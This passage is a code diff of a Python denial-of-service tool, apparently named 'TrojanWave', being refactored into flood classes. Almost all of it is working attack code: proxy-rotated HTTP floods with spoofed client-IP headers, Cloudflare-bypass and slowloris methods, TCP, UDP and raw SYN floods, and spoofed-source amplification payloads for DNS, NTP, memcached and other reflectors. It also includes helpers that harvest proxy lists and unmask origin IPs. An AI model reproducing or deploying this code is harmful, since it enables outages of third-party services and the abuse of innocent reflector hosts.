"TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" - try: - for _ in range(multiple): - s.post(sys.argv[2], timeout=1, data=payload) - except: - s.close() - except: - s.close() - - -def dgb(event, socks_type): - proxy = Choice(proxies).strip().split(":") - event.wait() - while time.time() < timer: - try: - s = cfscrape.create_scraper() - if socks_type == 5 or socks_type == 4: - s.proxies['http'] = 'socks{}://'.format(socks_type) + str( - proxy[0]) + ":" + str(proxy[1]) - s.proxies['https'] = 'socks{}://'.format(socks_type) + str( - proxy[0]) + ":" + str(proxy[1]) - if socks_type == 1: - s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str( - proxy[1]) - s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str( - proxy[1]) - if protocol == "https": - s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" - try: - sleep(5) - for _ in range(multiple): - s.get(sys.argv[2]) - except: - s.close() - except: - s.close() - - -def head(event, socks_type): - proxy = Choice(proxies).strip().split(":") - header = Headers("head") - head_host = "HEAD " + path + "?" + random_data( - ) + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = head_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def null(event, socks_type): - proxy = Choice(proxies).strip().split(":") - header = Headers("null") - head_host = "HEAD " + path + "?" + random_data( - ) + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = head_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def gsb(event, socks_type): - proxy = Choice(proxies).strip().split(":") - header = Headers("head") - head_host = "HEAD " + path + "?q=" + str(Intn( - 000000000, 999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = head_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - sleep(5) - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def hit(event, timer): - global s - request = Headers("hit") - event.wait() - while time.time() < timer: - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((str(target), int(port))) - try: - for _ in range(multiple): - s.sendall(str.encode(request)) - except: - s.close() - except: - s.close() - - -def cfbc(event, socks_type): - request = Headers("cfb") - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.sendall(str.encode(request)) - except: - s.close() - except: - s.close() - - -def post(event, socks_type): - request = Headers("post") - proxy = Choice(proxies).strip().split(":") - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.sendall(str.encode(request)) - except: - s.close() - except: - s.close() - - -def stress(event, socks_type): - request = Headers("stress") - proxy = Choice(proxies).strip().split(":") - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.sendall(str.encode(request)) - except: - s.close() - except: - s.close() - - -def ostress(event, timer): - request = Headers("stress") - event.wait() - while time.time() < timer: - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((str(target), int(port))) - try: - for _ in range(multiple): - s.sendall(str.encode(request)) - except: - s.close() - except: - s.close() - - -socket_list = [] -t = 0 - - -def slow(conn, socks_type): - global t - proxy = Choice(proxies).strip().split(":") - get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - header = Headers("get") - request = get_host + header - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - for _ in range(conn): - try: - s.send(request) * conn - t += 1 - sys.stdout.write("Connections = " + t + "\r") - sys.stdout.flush() - except: - s.close() - proxy = Choice(proxies).strip().split(":") - except: - s.close() - proxy = Choice(proxies).strip().split(":") - - -def checking(lines, socks_type, ms): - global nums, proxies - proxy = lines.strip().split(":") - s = socks.socksocket() - if len(proxy) != 2: - proxies.remove(lines) - return - err = 0 - while True: - if err == 3: - proxies.remove(lines) - break - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.settimeout(ms) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) - s.close() - break - except: - err += 1 - nums += 1 - - -nums = 0 - - -def check_socks(ms): - global nums - thread_list = [] - for lines in list(proxies): - if choice == "5": - th = threading.Thread(target=checking, args=( - lines, - 5, - ms, - )) - th.start() - if choice == "4": - th = threading.Thread(target=checking, args=( - lines, - 4, - ms, - )) - th.start() - if choice == "1": - th = threading.Thread(target=checking, args=( - lines, - 1, - ms, - )) - th.start() - thread_list.append(th) - sleep(0.01) - for th in list(thread_list): - th.join() - ans = "y" - if ans == "y" or ans == "": - if choice == "4": - with open(out_file, 'wb') as fp: - for lines in list(proxies): - fp.write(bytes(lines, encoding='utf8')) - fp.close() - elif choice == "5": - with open(out_file, 'wb') as fp: - for lines in list(proxies): - fp.write(bytes(lines, encoding='utf8')) - fp.close() - elif choice == "1": - with open(out_file, 'wb') as fp: - for lines in list(proxies): - fp.write(bytes(lines, encoding='utf8')) - fp.close() - - -def check_list(socks_file): - temp = open(socks_file).readlines() - temp_list = [] - for i in temp: - if i not in temp_list: - if ':' in i: - temp_list.append(i) - rfile = open(socks_file, "wb") - for i in list(temp_list): - rfile.write(bytes(i, encoding='utf-8')) - rfile.close() - - -def downloadsocks(choice): - global out_file - if choice == "4": - f = open(out_file, 'wb') - try: - r = requests.get( - "https://www.proxy-list.download/api/v1/get?type=socks4", - timeout=30) - f.write(r.content) - except: - pass - try: - r = requests.get("https://www.proxyscan.io/download?type=socks4", - timeout=30) - f.write(r.content) - except: - pass - try: - r = requests.get( - "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt", - timeout=30) - f.write(r.content) - f.close() - except: - f.close() - if choice == "5": - f = open(out_file, 'wb') - try: - r = requests.get( - "https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all", - timeout=30) - f.write(r.content) - except: - pass - try: - r = requests.get( - "https://www.proxy-list.download/api/v1/get?type=socks5", - timeout=30) - f.write(r.content) - f.close() - except: - pass - try: - r = requests.get("https://www.proxyscan.io/download?type=socks5", - timeout=30) - f.write(r.content) - f.close() - except: - pass - try: - r = requests.get( - "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt", - timeout=30) - f.write(r.content) - except: - pass - try: - r = requests.get( - "https://gist.githubusercontent.com/Azuures/1e0cb7a1097c720b4ed2aa63acd82179/raw/97d2d6a11873ffa8ca763763f7a5dd4035bcf95f/fwefnwex", - timeout=30) - f.write(r.content) - f.close() - except: - f.close() - if choice == "1": - f = open(out_file, 'wb') - try: - r = requests.get( - "https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all", - timeout=30) - f.write(r.content) - except: - pass - try: - r = requests.get( - "https://www.proxy-list.download/api/v1/get?type=http", - timeout=30) - f.write(r.content) - f.close() - except: - pass - try: - r = requests.get("https://www.proxyscan.io/download?type=http", - timeout=30) - f.write(r.content) - f.close() - except: - pass - try: - r = requests.get( - "https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt", - timeout=30) - f.write(r.content) - f.close() - except: - f.close() - - -def main(): - global proxies, multiple, choice, timer, out_file - method = str(sys.argv[1]).lower() - - out_file = str("files/proxys/" + sys.argv[5]) - if not os.path.exists(out_file): - makefile(out_file) - - if method == "check": - proxydl(out_file, socks_type) - exit() - if method == "stop": - url = str(sys.argv[2]).strip() - UrlFixer(url) - stop() - elif (method == "help") or (method == "h"): - usge() - elif (method == "check"): - pass - elif str(method.upper()) not in str(methods): - print("method not found") - exit() - timer = int(time.time()) + int(sys.argv[7]) - url = str(sys.argv[2]).strip() - UrlFixer(url) - choice = str(sys.argv[3]).strip() - if choice != "4" and choice != "5" and choice != "1": - print("Socks Type Not Found [4, 5, 1]") - exit() - if choice == "4": - socks_type = 4 - elif choice == "1": - socks_type = 1 - else: - socks_type = 5 - threads = int(sys.argv[4]) - proxies = open(out_file).readlines() - if method == "slow": - conn = threads - proxydl(out_file, socks_type) - print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ". - format(method, target, port, sys.argv[7], len(proxies), - str(nums))) - - for _ in range(conn): - threading.Thread(target=slow, args=(conn, socks_type), - daemon=True).start() - else: - multiple = str((sys.argv[6])) - if multiple == "": - multiple = int(100) + return f"-- B" + + @staticmethod + def humanformat(num: int, precision: int = 2): + suffixes = ['', 'k', 'm', 'g', 't', 'p'] + if num > 999: + obje = sum([abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))]) + return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}' else: - multiple = int(multiple) - event = threading.Event() - start_attack(method, threads, event, socks_type) - event.clear() - event.set() - while True: - try: - sleep(0.1) - except KeyboardInterrupt: - break + return num -def proxydl(out_file, socks_type): - global proxies, multiple, choice, data - ms = 1 - if socks_type == 1: - socktyper = "HTTP" - if socks_type == 4: - socktyper = "SOCKS4" - if socks_type == 5: - socktyper = "SOCKS5" +class Proxy: + port: int + host: str + typeInt: int - print("downloading {}'s proxy plz wait".format(socktyper)) - downloadsocks(choice) - proxies = open(str(out_file)).readlines() - check_list(out_file) - check_socks(ms) + def __init__(self, host: str, port: int, typeInt: int) -> None: + self.host = host + self.port = port + self.typeInt = typeInt + self._typeName = "SOCKS4" if typeInt == 4 else \ + "SOCKS5" if typeInt == 5 else \ + "HTTP" + + def __str__(self): + return "%s:%d" % (self.host, self.port) + + def __repr__(self): + return "%s:%d" % (self.host, self.port) + + def Check(self, url: str = "https://google.com", timeout: int = 1) -> bool: + with suppress(TimeoutError): + return get(url, proxies=self.toRequests(), timeout=timeout).status_code not in [403, 400] + return False + + def toRequests(self): + return {'http': "%s://%s:%d" % (self._typeName.lower(), + self.host, + self.port)} -bds = 0 +class Layer4(Thread): + _method: str + _target: Tuple[str, int] + _ref: List[str] | None + SENT_FLOOD: Any + _amp_payloads = cycle(Any) + + def __init__(self, target: Tuple[str, int], + ref: List[str] = None, + method: str = "TCP", + synevent: Event = None): + super().__init__(daemon=True) + self._amp_payload = None + self._amp_payloads = cycle([]) + self._ref = ref + self._method = method + self._target = target + self._synevent = synevent + + def run(self) -> None: + if self._synevent: self._synevent.wait() + self.select(self._method) + while self._synevent.is_set(): + self.SENT_FLOOD() + + def select(self, name): + self.SENT_FLOOD = self.TCP + if name == "UDP": self.SENT_FLOOD = self.UDP + if name == "SYN": self.SENT_FLOOD = self.SYN + if name == "VSE": self.SENT_FLOOD = self.VSE + if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT + if name == "RDP": + self._amp_payload = (b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389) + self.SENT_FLOOD = self.AMP + self._amp_payloads = cycle(self._generate_amp()) + if name == "MEM": + self._amp_payload = (b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211) + self.SENT_FLOOD = self.AMP + self._amp_payloads = cycle(self._generate_amp()) + if name == "CHAR": + self._amp_payload = (b'\x01', 19) + self.SENT_FLOOD = self.AMP + self._amp_payloads = cycle(self._generate_amp()) + if name == "ARD": + self._amp_payload = (b'\x00\x14\x00\x00', 3283) + self.SENT_FLOOD = self.AMP + self._amp_payloads = cycle(self._generate_amp()) + if name == "NTP": + self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123) + self.SENT_FLOOD = self.AMP + self._amp_payloads = cycle(self._generate_amp()) + if name == "DNS": + self._amp_payload = (b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00' + b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53) + self.SENT_FLOOD = self.AMP + self._amp_payloads = cycle(self._generate_amp()) + + def TCP(self) -> None: + with suppress(TimeoutError), \ + socket(AF_INET, SOCK_STREAM, SOL_TCP) as s: + s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) + s.connect(self._target) + while s.send(randbytes(1024)): + continue + + def MINECRAFT(self) -> None: + with suppress(TimeoutError), \ + socket(AF_INET, SOCK_STREAM, SOL_TCP) as s: + s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) + s.connect(self._target) + + s.send(b'\x0f\x1f0\t' + self._target[0].encode() + b'\x0fA') + + while s.send(b'\x01'): + s.send(b'\x00') + + def UDP(self) -> None: + with suppress(TimeoutError), \ + socket(AF_INET, SOCK_DGRAM) as s: + while s.sendto(randbytes(1024), self._target): + continue + + def SYN(self) -> None: + with suppress(TimeoutError), \ + socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s: + s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) + while s.sendto(self._genrate_syn(), self._target): + continue + + def AMP(self) -> None: + with suppress(TimeoutError), \ + socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s: + s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) + while s.sendto(*next(self._amp_payloads)): + continue + + def VSE(self) -> None: + with suppress(TimeoutError), \ + socket(AF_INET, SOCK_STREAM) as s: + while s.sendto((b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65' + b'\x20\x51\x75\x65\x72\x79\x00'), self._target): + continue + + def _genrate_syn(self) -> bytes: + ip: IP = IP() + ip.set_ip_src(localIP) + ip.set_ip_dst(self._target[0]) + tcp: TCP = TCP() + tcp.set_SYN() + tcp.set_th_dport(self._target[1]) + tcp.set_th_sport(randint(1, 65535)) + ip.contains(tcp) + return ip.get_packet() + + def _generate_amp(self): + payloads = [] + for ref in self._ref: + ip: IP = IP() + ip.set_ip_src(self._target[0]) + ip.set_ip_dst(ref) + + ud: UDP = UDP() + ud.set_uh_dport(self._amp_payload[1]) + ud.set_uh_sport(self._target[1]) + + ud.contains(Data(self._amp_payload[0])) + ip.contains(ud) + + payloads.append((ip.get_packet(), (ref, self._amp_payload[1]))) + return payloads -# layer tool :|||||||||||| -def toolgui(): - global bds - tos = str(to).replace("'", "").replace("[", - "").replace("]", - "").replace(",", "\n") - if bds == 0: - print(''' -Tools: - ''' + tos + ''' -Other: - Clear - Exit - ''') - bds = 1 - tool = input(socket.gethostname() + "@" + name + ":~# ").lower() - if tool != "e" and (tool != "exit") and (tool != "q") and ( - tool != "quit") and (tool != "logout") and (tool != "close"): - pass - else: - exit() - if tool == "cfip": - domain = input(socket.gethostname() + '@' + name + - '}:~/give-me-ipaddress# ') - cfip(domain) - return tools() - elif tool == "dstat": - print(tool + ": command ready") - return tools() - elif tool == "dns": - return tools() - elif tool == "check": - domain = input(socket.gethostname() + '@' + name + - '}:~/give-me-ipaddress# ') - check(domain) - return tools() - elif tool == "ping": - domain = input(socket.gethostname() + '@' + name + - '}:~/give-me-ipaddress# ') - piger(domain) - return tools() - elif tool == "info": - domain = input(socket.gethostname() + '@' + name + - '}:~/give-me-ipaddress# ') - piger(domain) - return tools() - elif (tool == "help") or (tool == "h") or (tool == "?"): - tos = str(to).replace("'", - "").replace("[", - "").replace("]", - "").replace(",", "\n") - print(''' -Tools: - {tos} -Other: - Clear - Exit - ''') - return tools() - elif (tool == "cls") or (tool == 'clear') or (tool == 'c'): - print("\033[H\033[J") - return tools() - elif not tool: - return tools() +class HttpFlood(Thread): + _proxies: cycle = None + _payload: str + _defaultpayload: str + _req_type: str + _useragents: List[str] + _referers: List[str] + _target: URL + _method: str + _rpc: int + _synevent: Event | None + SENT_FLOOD: Any - elif " " in tool: - return tools() - elif " " in tool: - return tools() - elif " " in tool: - return tools() - elif "\n" in tool: - return tools() - elif "\r" in tool: - return tools() + def __init__(self, target: URL, method: str = "GET", rpc: int = 1, + synevent: Event = None, useragents: Set[str] = None, + referers: Set[str] = None, + proxy_type: int = 1, + proxies: Set[Proxy] = None) -> None: + super().__init__(daemon=True) + self.SENT_FLOOD = None + self._synevent = synevent + self._rpc = rpc + self._method = method + self._proxy_type = self.getProxyType(list(({proxy_type} & {1, 4, 5}) or 1)[0]) + self._target = target + if not referers: + referers: List[str] = ["https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=", + ",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer" + "/sharer.php?u=", + ",https://drive.google.com/viewerng/viewer?url=", + ",https://www.google.com/translate?u="] + self._referers = list(referers) + if proxies: + self._proxies = cycle(proxies) + if not useragents: + useragents: List[str] = [ + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 ' + 'Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 ' + 'Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 ' + 'Safari/537.36', + 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'] + self._useragents = list(useragents) + self._req_type = self.getMethodType(method) + self._defaultpayload = "%s %s HTTP/1.1\r\n" % (self._req_type, target.raw_path_qs) + self._payload = (self._defaultpayload + + 'Accept-Encoding: gzip, deflate, br\r\n' + 'Accept-Language: en-US,en;q=0.9\r\n' + 'Cache-Control: max-age=0\r\n' + 'Connection: Keep-Alive\r\n' + 'Sec-Fetch-Dest: document\r\n' + 'Sec-Fetch-Mode: navigate\r\n' + 'Sec-Fetch-Site: none\r\n' + 'Sec-Fetch-User: ?1\r\n' + 'Sec-Gpc: 1\r\n' + 'Pragma: no-cache\r\n' + 'Upgrade-Insecure-Requests: 1\r\n') - else: - print(tool + ": command not found") - return tools() + def run(self) -> None: + if self._synevent: self._synevent.wait() + self.select(self._method) + while self._synevent.is_set(): + self.SENT_FLOOD() + + @property + def SpoofIP(self) -> str: + spoof: str = Tools.randIPv4() + payload: str = "" + payload += "X-Forwarded-Proto: Http\r\n" + payload += f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n" + payload += f"Via: {spoof}\r\n" + payload += f"Client-IP: {spoof}\r\n" + payload += f'X-Forwarded-For: {spoof}\r\n' + payload += f'Real-IP: {spoof}\r\n' + return payload + + def generate_payload(self, other: str = None) -> bytes: + payload: str | bytes = self._payload + payload += "Host: %s\r\n" % self._target.authority + payload += self.randHeadercontent + payload += other if other else "" + return str.encode(f"{payload}\r\n") + + def setup_socksocket(self, sock) -> socksocket: + if self._target.scheme == "https": + sock = ctx.wrap_socket(sock, server_hostname=self._target.host, server_side=False, + do_handshake_on_connect=True, suppress_ragged_eofs=True) + if self._proxies: + proxy: Proxy = next(self._proxies) + sock.set_proxy(self._proxy_type, proxy.host, proxy.port) + sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) + sock.connect((self._target.host, self._target.port or 80)) + return sock + + @property + def randHeadercontent(self) -> str: + payload: str = "" + payload += f"User-Agent: {randchoice(self._useragents)}\r\n" + payload += f"Referrer: {randchoice(self._referers)}\r\n" + payload += self.SpoofIP + return payload + + @staticmethod + def getMethodType(method: str) -> str: + return "GET" if {method.upper()} & {"CFB", "GET", "COOKIE", "OVH", "EVEN", + "STRESS", "DYN", "SLOW", "PPS"} \ + else "POST" if {method.upper()} & {"POST"} \ + else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \ + else "REQUESTS" + + def POST(self) -> None: + payload: bytes = self.generate_payload((f"Content-Length: {32}\r\n" + "X-Requested-With: XMLHttpRequest\r\n" + "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\n" + f"data={Tools.randString(32)}\r\n")) + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def STRESS(self) -> None: + payload: bytes = self.generate_payload((f"Content-Length: {2048}\r\n" + "X-Requested-With: XMLHttpRequest\r\n" + "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\n" + f"data={Tools.randString(2048)}\r\n" + "Cookie: %s=%s" % (Tools.randString(12), + Tools.randString(100)))) + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def COOKIES(self) -> None: + payload: bytes = self.generate_payload("Cookie: _ga=GA%s;" + " _gat=1;" + " __cfduid=dc232334gwdsd23434542342342342475611928;" + " %s=%s\r\n" % (randint(1000, 99999), + Tools.randString(6), + Tools.randString(32))) + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def PPS(self) -> None: + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(self._defaultpayload) + + def GET(self) -> None: + payload: bytes = self.generate_payload() + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def EVEN(self) -> None: + payload: bytes = self.generate_payload() + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + while s.send(payload) and s.recv(1): + continue + + def OVH(self) -> None: + payload: bytes = self.generate_payload() + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(min(self._rpc, 5)): + s.send(payload) + + def CFB(self): + pro = None + if self._proxies: + pro = next(self._proxies) + with suppress(TimeoutError), \ + create_scraper() as s: + for _ in range(self._rpc): + if pro: + s.get(self._target.human_repr(), proxies=pro.toRequests()) + continue + s.get(self._target.human_repr()) + + def AVB(self): + pro = None + if self._proxies: + pro = next(self._proxies) + with suppress(TimeoutError), \ + Session() as s: + for _ in range(self._rpc): + if pro: + s.post(self._target.human_repr(), proxies=pro.toRequests()) + continue + s.post(self._target.human_repr()) + + def DGB(self): + with suppress(TimeoutError), \ + create_scraper() as s: + for _ in range(min(self._rpc, 5)): + sleep(min(self._rpc, 5) / 100) + if self._proxies: + pro = next(self._proxies) + s.get(self._target.human_repr(), proxies=pro.toRequests()) + continue + s.get(self._target.human_repr()) + + def DYN(self): + payload: str | bytes = self._payload + payload += "Host: %s.%s\r\n" % (Tools.randString(6), self._target.authority) + payload += self.randHeadercontent + payload += self.SpoofIP + payload = str.encode(f"{payload}\r\n") + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def GSB(self): + payload: str | bytes = self._payload + payload += "Host: %s?q=%s\r\n" % (self._target.authority, Tools.randString(6)) + payload += self.randHeadercontent + payload += self.SpoofIP + payload = str.encode(f"{payload}\r\n") + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def NULL(self) -> None: + payload: str | bytes = self._payload + payload += "Host: %s\r\n" % self._target.raw_authority + payload += "User-Agent: null\r\n" + payload += "Referrer: null\r\n" + payload += self.SpoofIP + payload = str.encode(f"{payload}\r\n") + + with suppress(TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + + def SLOW(self): + payload: bytes = self.generate_payload() + + with suppress(OSError, ConnectionError, TimeoutError), self.setup_socksocket( + socksocket(AF_INET, SOCK_STREAM, SOL_TCP)) as s: + for _ in range(self._rpc): + s.send(payload) + while s.send(payload) and s.recv(1): + for i in range(self._rpc): + s.send(str.encode("X-a: %d\r\n" % randint(1, 5000))) + sleep(self._rpc / 15) + break + + def select(self, name: str) -> None: + self.SENT_FLOOD = self.GET + if name == "POST": self.SENT_FLOOD = self.POST + if name == "CFB": self.SENT_FLOOD = self.CFB + if name == "BYPASS": self.SENT_FLOOD = self.BYPASS + if name == "OVH": self.SENT_FLOOD = self.OVH + if name == "AVB": self.SENT_FLOOD = self.AVB + if name == "STRESS": self.SENT_FLOOD = self.STRESS + if name == "DYN": self.SENT_FLOOD = self.DYN + if name == "SLOW": self.SENT_FLOOD = self.SLOW + if name == "GSB": self.SENT_FLOOD = self.GSB + if name == "NULL": self.SENT_FLOOD = self.NULL + if name == "COOKIE": self.SENT_FLOOD = self.COOKIES + if name == "PPS": self.SENT_FLOOD = self.PPS + if name == "EVEN": self.SENT_FLOOD = self.EVEN + + def BYPASS(self): + pro = None + if self._proxies: + pro = next(self._proxies) + with suppress(TimeoutError), \ + Session() as s: + for _ in range(self._rpc): + if pro: + s.get(self._target.human_repr(), proxies=pro.toRequests()) + continue + s.get(self._target.human_repr()) + + @staticmethod + def getProxyType(typeInt: int): + return SOCKS4 if typeInt == 4 else \ + SOCKS5 if typeInt == 5 else \ + HTTP -def tools(): - global domain, name - name = "TrojanWave" - try: - tool = sys.argv[2].lower() - if tool != "dstat": - domain = sys.argv[3] - if str('.') not in str(domain): - print('address not found') - toolgui() - if tool == "cfip": - cfip(domain) - elif tool == "dns": - print(tool + ": comming soon !") - elif tool == "check": - check(domain) - elif tool == "ping": - piger(domain) - elif tool == "dstat": - address = requests.get('http://ipinfo.io/ip', - headers={ - "User-Agent": UserAgent, - }).text - print('now please attack to {address}') - os.system('dstat') - else: - print('tool not found') - toolgui() - except IndexError: - toolgui() +class Regex: + IP = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}") -def cfip(domain): - if str("http") in str(domain): - domain = domain.replace('https://', '').replace('http:', - '').replace('/') - URL = "http://www.crimeflare.org:82/cgi-bin/cfsearch.cgi" - r = requests.post(URL, - data={"cfS": {domain}}, - headers={ - "User-Agent": UserAgent, - }, - timeout=1) - print(r.text) +class ProxyManager: + @staticmethod + def DownloadFromConfig(cf) -> Set[Proxy]: + proxes: Set[Proxy] = set() + for provider in cf["proxy-providers"]: + 